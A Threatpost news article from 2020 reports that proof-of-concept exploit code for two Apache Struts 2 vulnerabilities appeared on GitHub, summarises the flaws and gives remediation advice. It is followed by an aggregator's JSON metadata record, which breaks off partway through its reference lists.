PoC Exploit Targeting Apache Struts Surfaces on GitHub

2020-08-14T21:20:01

Description

Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations. The Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team. Struts 2 is an open-source coding framework and library for enterprise developers popular with developers and companies when creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November. [![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) Researchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). ## **PoC Released to GitHub** The proof-of-concept (PoC) [released this week ](<https://github.com/cellanu/cve-2019-0230>)raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java language that can let attackers access data objects, and then use them to create and inject server-side code. “Successful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,” according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security. While the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). The vulnerability affects the write permissions of file directories that could lead to conditions ripe for a DoS attack. According to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Strut’s Action that exposes the file. “An attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container’s temp directory to read only, such that subsequent upload actions will fail,” [according the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>). The Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack. **_It’s the age of remote working, and businesses are facing new and bigger cyber-risks – whether it’s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary [Threatpost eBook](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>), 2020 in Security: Four Stories from the New Threat Landscape, presented in conjunction with Forcepoint. We redefine “secure” in a work-from-home world and offer compelling real-world best practices. [Click here to download our eBook now](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)._**

{"id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source coding framework and library for enterprise developers popular with developers and companies when creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November. \n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) \nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week ](<https://github.com/cellanu/cve-2019-0230>)raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java language that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). The vulnerability affects the write permissions of file directories that could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Strut\u2019s Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n\n**_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary [Threatpost eBook](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>), 2020 in Security: Four Stories from the New Threat Landscape, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. [Click here to download our eBook now](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)._**\n", "published": "2020-08-14T21:20:01", "modified": "2020-08-14T21:20:01", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "reporter": "Tom Spring", "references": ["https://cwiki.apache.org/confluence/display/WW/S2-059", "https://cwiki.apache.org/confluence/display/WW/S2-060", "https://threatpost.com/newsletter-sign/", "https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/", "https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/", "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "https://github.com/cellanu/cve-2019-0230", "https://cwiki.apache.org/confluence/display/WW/S2-060", "https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook", "https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook"], "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "immutableFields": [], "lastseen": "2020-10-14T22:21:14", "viewCount": 2159, "enchantments": {"dependencies": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CONFSERVER-60189", "ATLASSIAN:CONFSERVER-60264", "ATLASSIAN:CWD-4879", "BAM-18242", "CONFSERVER-60264", "CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:1C1E9FA5-A4DB-4CE8-8770-2431CE166358", "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080", "AKB:CF76EF1F-CB59-4A29-ADB1-DA37C695142B"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676"]}, {"type": "cisa", "idList": ["CISA:3D9E69A26C68866B64ED6E4B31E270E6", "CISA:60BECD302CACD014F496544254DCB720"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2017-5638", "CISA-KEV-CVE-2020-5135"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"]}, {"type": "exploitdb", "idList": ["EDB-ID:49068"]}, {"type": "f5", "idList": ["F5:K24608264", "F5:K43451236"]}, {"type": "github", "idList": ["GHSA-CCP5-GG58-PXFM", "GHSA-J77Q-2QQG-6989", "GHSA-WP4H-PVGW-5727", "GITHUB:0519EA92487B44F364A1B35C85049455"]}, {"type": "githubexploit", "idList": ["453574C2-C801-529D-A0A6-5C5E1471F1AC", "4E339DB6-4704-5991-B690-DF8D7307532E", "5E7409E5-7716-5F40-999C-E6622B806F5E", "B1E738E0-BF1B-50E1-88E2-1D265CF9AEB8", "BD05B538-25EA-5C42-AE8D-229D78B57CB1"]}, {"type": "hackerone", "idList": ["H1:212022", "H1:212985", "H1:213069"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2", "HUAWEI-SA-20200902-01-STRUTS2"]}, {"type": "ibm", "idList": ["02304D05D897B568E77C8953094F5914F389089362655D2AB68B096E3F3418DC", "0766EE3C620AAAF614D24B4B93352C6C94F10148776C7854787A45858D29E32F", "20DAAA2A40C4A633F7230B8255F0CADBA6E88A77DD305EC21132BECBFF011089", "3477DD0939B4B8CC59240F8DCC09305A2F7C13CA45285602F1755CDF6F593B52", "35DB525D4E07A09A6F2976ED4B93F380507E2F51F096B5749BE6E096C57DD8BD", "43ABDDEF8A51FB28FC8C4825BAD26A0A25F5F21805BFC87561A0AEABFD065F37", "461BBFF276D2BD07EE935B18691B56E01933360B1B42DAE8AAFFC1167BCA5486", "48F6A099D2817EC515107FFC49C4E17438FAC35AB50A0F0C6F0B86E2F20FECE3", "546F05697B8F700EEF28B598121A8A3351E168124EB0852E39278EAE7A99C11B", "60BC7D4DCC3D358CA3A091D2D1C15EE5A67539C2664E72739BD35D6406A88E4A", "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "71763DB8BA3B87C5175E4ED1BF88B5F20D4D7107BB02006612C8229371E7C9F4", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "87B4000A01C23B6231C463A8E1B3BEC371361C202F46354684899DC113F12BC8", "9235ED396A90BB944C2B22072DE6B91B22155C3982DDD732067344CA700C0ADE", "C22DE952FD6E1544B14AE2735F81ACAE3EF08509FC895F0AAF0AC7485A98F798", "C6AE70E5471CDF678253E267AB7C45FA772A777F24502EE50E243BD88E300D13", "D769235D102AD19A73D51C968FFD8889D9656A19C29D4BE9C66233A668FC8B7A", "F1072FE090DABD963C764C2E009454B24AB02021B54C8519F4195C5ABC6E2FF5"]}, {"type": "ics", "idList": ["AA20-133A"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:697E34BE77BECD65BF763ECF92DD1B9F", "IMPERVABLOG:6BF557CA0830C9058E2409E8C914366C", "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:CD196CDD794CCCE3719A9D38DA5BE417", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "jvn", "idList": ["JVN:50890770"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4611207874033525364", "KITPLOIT:5052987141331551837", "KITPLOIT:5230099254245458698", "KITPLOIT:5420210148456420402", "KITPLOIT:7013881512724945934", "KITPLOIT:7835941952769002973", "KITPLOIT:8672599587089685905", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-APACHE-STRUTS-OPEN-SOURCE-FRAMEWORK-REMOTE-CODE-EXECUTION-NOSID", "LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-STRUTS2_MULTI_EVAL_OGNL-"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201786819", "MYHACK58:62201890758", "MYHACK58:62201891264", "MYHACK58:62201993410"]}, {"type": "nessus", "idList": ["700055.PRM", "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "SELLIGENT_MESSAGE_STUDIO_RCE.NBIN", "SONICWALL_SNWLID-2020-0010.NASL", "STRUTS_2_5_10_1_RCE.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "STRUTS_2_5_22.NASL", "WEB_APPLICATION_SCANNING_112726", "WEB_APPLICATION_SCANNING_112766"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VULN-CVE2017-5638.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310108771", "OPENVAS:1361412562310140180", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310141398", "OPENVAS:1361412562310810748", "OPENVAS:1361412562310811244"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUAPR2021", "ORACLE:CPUJAN2021", "ORACLE:CPUJUL2017", "ORACLE:CPUOCT2021"]}, {"type": "osv", "idList": ["OSV:GHSA-CCP5-GG58-PXFM", "OSV:GHSA-J77Q-2QQG-6989", "OSV:GHSA-WP4H-PVGW-5727"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:160108", "PACKETSTORM:160721"]}, {"type": "pentestit", "idList": ["PENTESTIT:C47AA6D1808026ACA45B1AD1CF25CA3B", "PENTESTIT:F5DFB26B34C75683830E664CBD58178F"]}, {"type": "ptsecurity", "idList": ["PT-2020-29"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5482AC1594C82A230828023816657B57"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638", "RH:CVE-2019-0230", "RH:CVE-2019-0233"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:1126B0AA9A8BD987E404F1746F1D8BFA", "SAINT:484D58D595B8F6CEE787306160971308", "SAINT:891A42933A0DE986694E3B7D51B3F2F1", "SAINT:966010900F7632E797C552D31C2BB53A", "SAINT:AE1DA80E6B0E4C12B5D781794166897B"]}, {"type": "securelist", "idList": ["SECURELIST:100DB957ACFED2B9DC6D860183E5B88F"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804"]}, {"type": "talosblog", "idList": ["TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "TALOSBLOG:DAD87115458AF1FB5EDF5A2BB21D8AB9", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:7FD924637D99697D78D53283817508DA", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:AF93AEDBDE6169AD1163D53979A4EA04", "THN:D6FED8C7635FDB50C271368C9373B439"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:033645C929899D29D91092278D188D8E", "THREATPOST:0A238D67F7286BA41103801846210F7A", "THREATPOST:0EAD358006302B8EB3637C22334E13DC", "THREATPOST:0ED2C20BB1821A77810AB2D29BB6A6A5", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:130EDA07603C228BE562B445904A297A", "THREATPOST:158524EA6F79769C547CC6A407EF6E78", "THREATPOST:1973BA4B294E79D107940CF5DA67CB9A", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "THREATPOST:32F51D65448FD7613BA513B6F8239EE9", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:39625C47309704502299C3CF93814CFA", "THREATPOST:3A306ADED5369A8AA74DD95614F98FBD", "THREATPOST:3F81254E133ABD9AE724F95349C0040A", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:49EFC5B6CFCA04F105A001AAFED52548", "THREATPOST:4A02969D23A7147DEF39EFDE11D3094E", "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "THREATPOST:51EF909F29E9FE8B04A35A1E24E52C08", "THREATPOST:5293ED4A454EC6487F8AA9DB9A0FF180", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:58C865E4F2AA34CD62938A2E6BBFDE44", "THREATPOST:597800CEAF4F4832B357C491661792B5", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5C0EFAEECFC2925A0D89538F79EE561A", "THREATPOST:5CB5F29FA05D52DEEC4D54AA46EB9235", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:60965118E4D29480FABA6D1722EFA4AA", "THREATPOST:639CADC540E81321048EB418C2EC7586", "THREATPOST:659B01C0432DD93535B729D005CCA9E8", "THREATPOST:6A1329627DFBA3501BA187A580E968D5", "THREATPOST:6F4D076CD2B99D42353A5547FDBB288C", "THREATPOST:701953AF963ADACDD2280B3D18B58493", "THREATPOST:70ADDCF33645E0424EA606C8912FDDCF", "THREATPOST:718E4F36F0096BBE66CB2FAE28048810", "THREATPOST:7229E2AD26BA4F6395ACBFE184C783EF", "THREATPOST:73F48A70A1B3DDD9B987BA26009E6630", "THREATPOST:779B904F971138531725D1E57FDFF9DD", "THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:7BA8370AF04822DCF1A03C685AF16604", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7FC78356FBFC440CD45BB996E2A8A5C8", "THREATPOST:815A85AC4471792F2F220EAD5DD49460", "THREATPOST:85A0FA8DF1A997221A2F71AF5B8CC3E8", "THREATPOST:88ED6BF6458FC657DACB44E3795710C1", "THREATPOST:8A8E859062970130E3F91D160F03325C", "THREATPOST:8DA5404E0E8179BD2E87B8F221395859", "THREATPOST:8E52FA6620F4FFE6ED3A412867239F2B", "THREATPOST:8F6E27B46891F0167D7799A73F1A9380", "THREATPOST:9234A5FE45618A7D601CF00D4A75748E", "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:96E2DCEDA40DFA7D30B6AB9F86D38FEB", "THREATPOST:97C27999457834C42771A5FB9EEAD852", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:9AADE8E4BD604BE3415C6DD56ECA3640", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:A43BC2773FE4FB67EB7B8F584F137132", "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "THREATPOST:A5D4FD6C2281AE395B821A8D0EB5736D", "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "THREATPOST:AACAA4F654495529E053D43901F00A81", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:ABBA6B89522F29EE1F01F3D010F46FC0", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:AD7CBD7ADE9D9F9DE3BBDB1AE8A6F81D", "THREATPOST:AF18435BD7544B43152D5D3E8B97CE30", "THREATPOST:B18EFE773F83789508C61F27321B9FAA", "THREATPOST:B313D27399CB1B0B0727DC338B57B95E", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B5964CC2880F7E4AFF1E9C5DEEE5B287", "THREATPOST:B664DFB1B57D66837AE025D5CD687F70", "THREATPOST:B6946D18AC7359473DB43051174C70B0", "THREATPOST:B9A8F6E46618F5253194C38A1808CF9C", "THREATPOST:B9E2C282835BF652ABC49052C859DBCC", "THREATPOST:BED35CFCFED307909DB60602551982A6", "THREATPOST:C22F323F8CA203A50435F11517317613", "THREATPOST:C249ACD6B53EBF0A2F149F42F6D9873D", "THREATPOST:C4650E22534F775312B3885DAA306DDA", "THREATPOST:C4D1E87CE4261EC62077E4F157643132", "THREATPOST:C51D2F2366676BB018956D93916AC33E", "THREATPOST:C7B22E2E8B3AB6D2FD4DA4F6C33951CF", "THREATPOST:C9AB0B1EBE1A344DC385414BD784DFC7", "THREATPOST:CA33E204EC4B2286ECCDD9C58B908175", "THREATPOST:CAAA6F4ECA9D8F91250F10C27A869E23", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:CEFF4DB144B2E463CD3FB46A8A93EEF8", "THREATPOST:CF4E8B0929D149A75E7512A74E569009", "THREATPOST:D0762E9D61E59AD261E8F24340AE261C", "THREATPOST:D2BB5A9DDB021A7E256A4E0D8A6BDA55", "THREATPOST:D3F7F2434B9347169B642A60BEC9FF02", "THREATPOST:D4F89B42660582EFECA648A891470AD4", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:D819574E836325FD37CCA2E8B9E979A1", "THREATPOST:DB4FE6FEC73D65579261FF6697220766", "THREATPOST:DF1387D21FA2EBF23BBB67081E7B75EC", "THREATPOST:DF35DF449CB3A8F93C405B227A00E117", "THREATPOST:DFC75A06F449D25EF03338C5D80C705C", "THREATPOST:E54A6B6E04C21B79F588B156DC5704F8", "THREATPOST:E95F180BE3CA693890795666169A5F04", "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "THREATPOST:EBE40A69B865E25E52FF87060EDD790F", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:EFC1ED7D43C4F52F844E131EAE00990F", "THREATPOST:EFC814A6564326F98824AC875F125E0D", "THREATPOST:F18124E38523CE6CF73ACDCF7DBF78BC", "THREATPOST:F1B41E6C07BCAD79CFBB003B91DF332F", "THREATPOST:F2B495A97075920EEF1C7328AE80CC7B", "THREATPOST:F334DD851AFA845C7A29CB75F55E8128", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "THREATPOST:FB79AC722601BBB92388FFC66EE0EAF4", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "trellix", "idList": ["TRELLIX:998AD206A06167AB1FB6F5CE0F427774"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", "TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-5638", "UB:CVE-2019-0230", "UB:CVE-2019-0233"]}, {"type": "veracode", "idList": ["VERACODE:26331", "VERACODE:26332"]}, {"type": "vmware", "idList": ["VMSA-2017-0004", "VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-35263", "1337DAY-ID-35571"]}]}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:1C1E9FA5-A4DB-4CE8-8770-2431CE166358", "AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "avleonov", "idList": ["AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0197", "CPAI-2017-0676"]}, {"type": "cisa", "idList": ["CISA:3D9E69A26C68866B64ED6E4B31E270E6"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2017-5638"]}, {"type": "exploitdb", "idList": ["EDB-ID:49068"]}, {"type": "f5", "idList": ["F5:K43451236"]}, {"type": "github", "idList": ["GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["453574C2-C801-529D-A0A6-5C5E1471F1AC", "4E339DB6-4704-5991-B690-DF8D7307532E", "5E7409E5-7716-5F40-999C-E6622B806F5E", "B1E738E0-BF1B-50E1-88E2-1D265CF9AEB8", "B41082A1-4177-53E2-A74C-8ABA13AA3E86", "BD05B538-25EA-5C42-AE8D-229D78B57CB1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "jvn", "idList": ["JVN:50890770"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379"]}, {"type": "nessus", "idList": ["STRUTS_2_5_10_1_WIN_LOCAL.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2021"]}, {"type": 